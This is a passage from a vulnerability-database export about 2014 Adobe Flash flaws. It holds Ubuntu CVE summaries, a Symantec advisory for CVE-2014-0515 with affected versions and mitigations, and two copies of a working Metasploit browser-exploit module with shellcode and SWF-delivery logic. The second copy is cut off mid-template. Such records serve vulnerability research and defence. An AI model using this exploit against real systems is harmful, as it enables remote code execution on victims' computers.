before 11.7.700.272 and 11.8.x through 12.0.x before\n12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows\nattackers to read the clipboard via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0504", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": 
"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0504"], "modified": "2014-03-12T00:00:00", "id": "UB:CVE-2014-0504", "href": "https://ubuntu.com/security/CVE-2014-0504", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T09:17:32", "description": "Adobe Flash Player before 11.7.700.272 and 11.8.x through 12.0.x before\n12.0.0.77 on Windows and OS X, and before 11.2.202.346 on Linux, allows\nremote attackers to bypass the Same Origin Policy via unspecified vectors.", "cvss3": {}, "published": "2014-03-12T00:00:00", "type": "ubuntucve", "title": "CVE-2014-0503", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0503"], "modified": "2014-03-12T00:00:00", "id": "UB:CVE-2014-0503", "href": "https://ubuntu.com/security/CVE-2014-0503", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-09-21T09:45:05", "description": "Double free vulnerability in Adobe Flash Player before 11.7.700.269 and\n11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before\n11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR\nSDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628\nallows remote attackers to execute arbitrary code via unspecified vectors,\nas exploited in the wild in February 2014.", "cvss3": {}, "published": "2014-02-21T00:00:00", "type": "ubuntucve", "title": 
"CVE-2014-0502", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0502"], "modified": "2014-02-21T00:00:00", "id": "UB:CVE-2014-0502", "href": "https://ubuntu.com/security/CVE-2014-0502", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T18:45:55", "description": "### Description\n\nAdobe Flash Player is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. 
Failed exploit attempts will likely result in denial-of-service conditions.\n\n### Technologies Affected\n\n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1 Release Candidate \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash 
Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.18 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.152 ~~~~X64~ \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.55 ~~~~X64~ \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 
11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.228 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.95 \n * Adobe Flash Player 11.3.300.214 \n * Adobe Flash Player 11.3.300.231 \n * Adobe Flash Player 11.3.300.250 \n * Adobe Flash Player 11.3.300.257 \n * Adobe Flash Player 11.3.300.262 \n * Adobe Flash Player 11.3.300.265 \n * Adobe Flash Player 11.3.300.268 \n * Adobe Flash Player 11.3.300.270 \n * Adobe Flash Player 11.3.300.271 \n * Adobe Flash Player 11.3.300.273 \n * Adobe Flash Player 11.3.31.230 \n * 
Adobe Flash Player 11.3.378.5 \n * Adobe Flash Player 11.4.400.231 \n * Adobe Flash Player 11.4.402.265 \n * Adobe Flash Player 11.4.402.278 \n * Adobe Flash Player 11.4.402.287 \n * Adobe Flash Player 11.5.500.80 \n * Adobe Flash Player 11.5.502.110 \n * Adobe Flash Player 11.5.502.118 \n * Adobe Flash Player 11.5.502.124 \n * Adobe Flash Player 11.5.502.131 \n * Adobe Flash Player 11.5.502.135 \n * Adobe Flash Player 11.5.502.136 \n * Adobe Flash Player 11.5.502.146 \n * Adobe Flash Player 11.5.502.149 \n * Adobe Flash Player 11.6.602.105 \n * Adobe Flash Player 11.6.602.167 \n * Adobe Flash Player 11.6.602.168 \n * Adobe Flash Player 11.6.602.171 \n * Adobe Flash Player 11.6.602.180 \n * Adobe Flash Player 11.7.700.169 \n * Adobe Flash Player 11.7.700.202 \n * Adobe Flash Player 11.7.700.224 \n * Adobe Flash Player 11.7.700.225 \n * Adobe Flash Player 11.7.700.232 \n * Adobe Flash Player 11.7.700.242 \n * Adobe Flash Player 11.7.700.252 \n * Adobe Flash Player 11.7.700.257 \n * Adobe Flash Player 11.7.700.260 \n * Adobe Flash Player 11.7.700.261 \n * Adobe Flash Player 11.7.700.269 \n * Adobe Flash Player 11.7.700.272 \n * Adobe Flash Player 11.7.700.275 \n * Adobe Flash Player 11.8.800.168 \n * Adobe Flash Player 11.8.800.170 \n * Adobe Flash Player 11.8.800.94 \n * Adobe Flash Player 11.8.800.97 \n * Adobe Flash Player 11.9.900.117 \n * Adobe Flash Player 11.9.900.152 \n * Adobe Flash Player 11.9.900.170 \n * Adobe Flash Player 12 \n * Adobe Flash Player 12.0.0.38 \n * Adobe Flash Player 12.0.0.41 \n * Adobe Flash Player 12.0.0.43 \n * Adobe Flash Player 12.0.0.44 \n * Adobe Flash Player 12.0.0.70 \n * Adobe Flash Player 12.0.0.77 \n * Adobe Flash Player 13.0.0.182 \n * Adobe Flash Player 13.0.0.201 \n * Adobe Flash Player 2 \n * Adobe Flash Player 3 \n * Adobe Flash Player 6 \n * Adobe Flash Player 6.0.21.0 \n * Adobe Flash Player 6.0.79 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7 \n * Adobe Flash Player 7.0.1 \n * Adobe Flash Player 7.0.14.0 \n * 
Adobe Flash Player 7.0.19.0 \n * Adobe Flash Player 7.0.24.0 \n * Adobe Flash Player 7.0.25 \n * Adobe Flash Player 7.0.53.0 \n * Adobe Flash Player 7.0.60.0 \n * Adobe Flash Player 7.0.61.0 \n * Adobe Flash Player 7.0.63 \n * Adobe Flash Player 7.0.66.0 \n * Adobe Flash Player 7.0.67.0 \n * Adobe Flash Player 7.0.68.0 \n * Adobe Flash Player 7.0.69.0 \n * Adobe Flash Player 7.0.70.0 \n * Adobe Flash Player 7.0.73.0 \n * Adobe Flash Player 7.1 \n * Adobe Flash Player 7.1.1 \n * Adobe Flash Player 7.2 \n * Adobe Flash Player 8 \n * Adobe Flash Player 8.0.22.0 \n * Adobe Flash Player 8.0.24.0 \n * Adobe Flash Player 8.0.33.0 \n * Adobe Flash Player 8.0.34.0 \n * Adobe Flash Player 8.0.35.0 \n * Adobe Flash Player 8.0.39.0 \n * Adobe Flash Player 8.0.42.0 \n * Adobe Flash Player 9 \n * Adobe Flash Player 9.0 \n * Adobe Flash Player 9.0.112.0 \n * Adobe Flash Player 9.0.114.0 \n * Adobe Flash Player 9.0.115.0 \n * Adobe Flash Player 9.0.124.0 \n * Adobe Flash Player 9.0.125.0 \n * Adobe Flash Player 9.0.151 .0 \n * Adobe Flash Player 9.0.152 .0 \n * Adobe Flash Player 9.0.155.0 \n * Adobe Flash Player 9.0.159.0 \n * Adobe Flash Player 9.0.16 \n * Adobe Flash Player 9.0.18D60 \n * Adobe Flash Player 9.0.20 \n * Adobe Flash Player 9.0.20.0 \n * Adobe Flash Player 9.0.246 0 \n * Adobe Flash Player 9.0.246.0 \n * Adobe Flash Player 9.0.260.0 \n * Adobe Flash Player 9.0.262 \n * Adobe Flash Player 9.0.262.0 \n * Adobe Flash Player 9.0.277.0 \n * Adobe Flash Player 9.0.28.0 \n * Adobe Flash Player 9.0.280 \n * Adobe Flash Player 9.0.283.0 \n * Adobe Flash Player 9.0.289.0 \n * Adobe Flash Player 9.0.31.0 \n * Adobe Flash Player 9.0.45.0 \n * Adobe Flash Player 9.0.47.0 \n * Adobe Flash Player 9.0.48.0 \n * Adobe Flash Player 9.0.8.0 \n * Adobe Flash Player 9.0.9.0 \n * Adobe Flash Player 9.125.0 \n * Adobe Flash Player for Mac 11.4.402.287 \n * Adobe Flash Player for Mac 11.5.502.110 \n * Adobe Flash Player for Mac 11.5.502.136 \n * Adobe Flash Player for Mac 11.5.502.146 \n 
* Adobe Flash Player for Mac 11.5.502.149 \n * Adobe Flash Player for Mac 11.6.602.167 \n * Adobe Flash Player for Mac 11.6.602.180 \n * Adobe Flash Player for Mac 11.7.700.169 \n * Adobe Flash Player for Mac 11.7.700.202 \n * Adobe Flash Player for Mac 11.7.700.225 \n * Adobe Flash Player for Mac 11.7.700.232 \n * Adobe Flash Player for Mac 11.7.700.242 \n * Adobe Flash Player for Mac 11.7.700.252 \n * Adobe Flash Player for Mac 11.8.800 97 \n * Adobe Flash Player for Mac 11.8.800.168 \n * Adobe Flash Player for Mac 11.8.800.94 \n * Adobe Flash Player for Mac 11.9.900.117 \n * Adobe Flash Player for Mac 11.9.900.152 \n * Adobe Flash Player for Mac 11.9.900.170 \n * Adobe Flash Player for Macintosh 11.7.700.269 \n * Adobe Flash Player for Macintosh 11.7.700.272 \n * Adobe Flash Player for Macintosh 11.9.900.170 \n * Adobe Flash Player for Macintosh 12.0.0 77 \n * Adobe Flash Player for Macintosh 12.0.0.38 \n * Adobe Flash Player for Macintosh 12.0.0.41 \n * Adobe Flash Player for Macintosh 12.0.0.44 \n * Adobe Flash Player for Macintosh 12.0.0.70 \n * Adobe Flash Player for Macintosh 13.0.0.182 \n * Adobe Flash Player for Macintosh 13.0.0.201 \n * Gentoo Linux \n * Microsoft Windows 8 for 32-bit Systems \n * Microsoft Windows 8 for 64-bit Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for 64-bit Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows RT \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Redhat Enterprise Linux Desktop Supplementary 5 Client \n * Redhat Enterprise Linux Desktop Supplementary 5 Server \n * Redhat Enterprise Linux Desktop Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary 6 \n * Redhat Enterprise Linux Server Supplementary AUS 6.5 server \n * Redhat Enterprise Linux Server Supplementary EUS 6.5.z \n * Redhat Enterprise Linux Workstation Supplementary 6 \n * SuSE Suse Linux Enterprise Desktop 11 SP3 \n * SuSE openSUSE 11.4 \n * SuSE openSUSE 12.3 \n * SuSE 
openSUSE 13.1 \n\n### Recommendations\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from a successful exploit. \n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo limit exposure to these and other latent vulnerabilities, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nTo reduce the likelihood of successful exploits, never visit sites of questionable integrity or follow links provided by unfamiliar or untrusted sources.\n\n**Implement multiple redundant layers of security.** \nAs an added precaution, deploy memory-protection schemes (such as nonexecutable stack/heap configuration and randomly mapped memory segments). This may complicate exploits of memory-corruption vulnerabilities.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, run applications with the minimal amount of privileges required for functionality. \n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2014-04-28T00:00:00", "type": "symantec", "title": "Adobe Flash Player CVE-2014-0515 Buffer Overflow Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-04-28T00:00:00", "id": "SMNTC-67092", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/67092", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-03-19T17:07:31", "description": "This Metasploit module exploits a buffer overflow vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This Metasploit module has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over Windows XP SP3, Windows 7 SP1 and Windows 8.", "cvss3": {}, "published": "2014-05-09T00:00:00", "type": "zdt", "title": "Adobe Flash Player Shader Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2014-05-09T00:00:00", "id": "1337DAY-ID-22232", "href": "https://0day.today/exploit/description/22232", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n include Msf::Exploit::Remote::BrowserExploitServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Adobe Flash Player Shader Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. 
The\r\n vulnerability occurs in the flash.Display.Shader class, when setting specially\r\n crafted data as its bytecode, as exploited in the wild in April 2014. This module\r\n has been tested successfully on IE 6 to IE 10 with Flash 11 and Flash 12 over\r\n Windows XP SP3, Windows 7 SP1 and Windows 8.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Unknown', # Vulnerability discovery and exploit in the wild\r\n 'juan vazquez' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-0515'],\r\n ['BID', '67092'],\r\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\r\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\r\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'Space' => 2000,\r\n 'DisableNops' => true,\r\n 'PrependEncoder' => stack_adjust\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'InitialAutoRunScript' => 'migrate -f',\r\n 'Retries' => false,\r\n 'EXITFUNC' => \"thread\"\r\n },\r\n 'Platform' => 'win',\r\n 'BrowserRequirements' =>\r\n {\r\n :source => /script|headers/i,\r\n :clsid => \"{D27CDB6E-AE6D-11cf-96B8-444553540000}\",\r\n :method => \"LoadMovie\",\r\n :os_name => Msf::OperatingSystems::WINDOWS,\r\n :ua_name => Msf::HttpClients::IE,\r\n :flash => lambda { |ver| ver =~ /^11\\./ || ver =~ /^12\\./ || (ver =~ /^13\\./ && ver <= '13.0.0.182') }\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', {} ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Apr 28 2014\",\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def exploit\r\n @swf = create_swf\r\n super\r\n end\r\n\r\n def stack_adjust\r\n adjust = \"\\x64\\xa1\\x18\\x00\\x00\\x00\" # mov eax, fs:[0x18 # get teb\r\n adjust << \"\\x83\\xC0\\x08\" # add eax, byte 8 # get pointer to stacklimit\r\n adjust << \"\\x8b\\x20\" # mov esp, [eax] # put esp at stacklimit\r\n adjust << 
\"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # plus a little offset\r\n\r\n adjust\r\n end\r\n\r\n def on_request_exploit(cli, request, target_info)\r\n print_status(\"Request: #{request.uri}\")\r\n\r\n if request.uri =~ /\\.swf$/\r\n print_status(\"Sending SWF...\")\r\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})\r\n return\r\n end\r\n\r\n print_status(\"Sending HTML...\")\r\n tag = retrieve_tag(cli, request)\r\n profile = get_profile(tag)\r\n profile[:tried] = false unless profile.nil? # to allow request the swf\r\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\r\n end\r\n\r\n def exploit_template(cli, target_info)\r\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\r\n flash_payload = \"\"\r\n get_payload(cli,target_info).unpack(\"V*\").each do |i|\r\n flash_payload << \"0x#{i.to_s(16)},\"\r\n end\r\n flash_payload.gsub!(/,$/, \"\")\r\n\r\n\r\n html_template = %Q|<html>\r\n <body>\r\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\r\n <param name=\"movie\" value=\"<%=swf_random%>\" />\r\n <param name=\"allowScriptAccess\" value=\"always\" />\r\n <param name=\"FlashVars\" value=\"sh=<%=flash_payload%>\" />\r\n <param name=\"Play\" value=\"true\" />\r\n </object>\r\n </body>\r\n </html>\r\n |\r\n\r\n return html_template, binding()\r\n end\r\n\r\n def create_swf\r\n path = ::File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2014-0515\", \"Graph.swf\" )\r\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\r\n\r\n swf\r\n end\r\n\r\nend\n\n# 0day.today [2018-03-19] #", "sourceHref": "https://0day.today/exploit/22232", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2023-06-24T18:06:58", "description": "This module exploits a buffer overflow 
vulnerability in Adobe Flash Player. The vulnerability occurs in the flash.Display.Shader class, when setting specially crafted data as its bytecode, as exploited in the wild in April 2014. This module has been tested successfully on the following operating systems and Flash versions: Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182, Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182, Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182, Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350\n", "cvss3": {}, "published": "2015-06-11T21:18:50", "type": "metasploit", "title": "Adobe Flash Player Shader Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0515"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-MULTI-BROWSER-ADOBE_FLASH_PIXEL_BENDER_BOF-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/adobe_flash_pixel_bender_bof/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player Shader Buffer Overflow',\n 'Description' => %q{\n This module exploits a buffer overflow vulnerability in Adobe Flash Player. The\n vulnerability occurs in the flash.Display.Shader class, when setting specially\n crafted data as its bytecode, as exploited in the wild in April 2014. 
This module\n has been tested successfully on the following operating systems and Flash versions:\n\n Windows 7 SP1, IE 8 to IE 11 with Flash 13.0.0.182,\n Windows 7 SP1, Firefox 38.0.5, Flash 11.7.700.275 and Adobe Flash 13.0.0.182,\n Windows 8.1, Firefox 38.0.5 and Adobe Flash 13.0.0.182,\n Linux Mint \"Rebecca\" (32 bit), Firefox 33.0 and Adobe Flash 11.2.202.350\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Vulnerability discovery and exploit in the wild\n 'juan vazquez' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2014-0515'],\n ['BID', '67092'],\n ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],\n ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if ver =~ /^11\\./ && Rex::Version.new(ver) <= Rex::Version.new('11.7.700.275')\n return true if ver =~ /^12\\./\n return true if ver =~ /^13\\./ && Rex::Version.new(ver) <= Rex::Version.new('13.0.0.182')\n when 'Linux'\n return true if ver =~ /^11\\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.350')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n 
{\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2014-04-28',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n os_name = target_info[:os_name]\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param 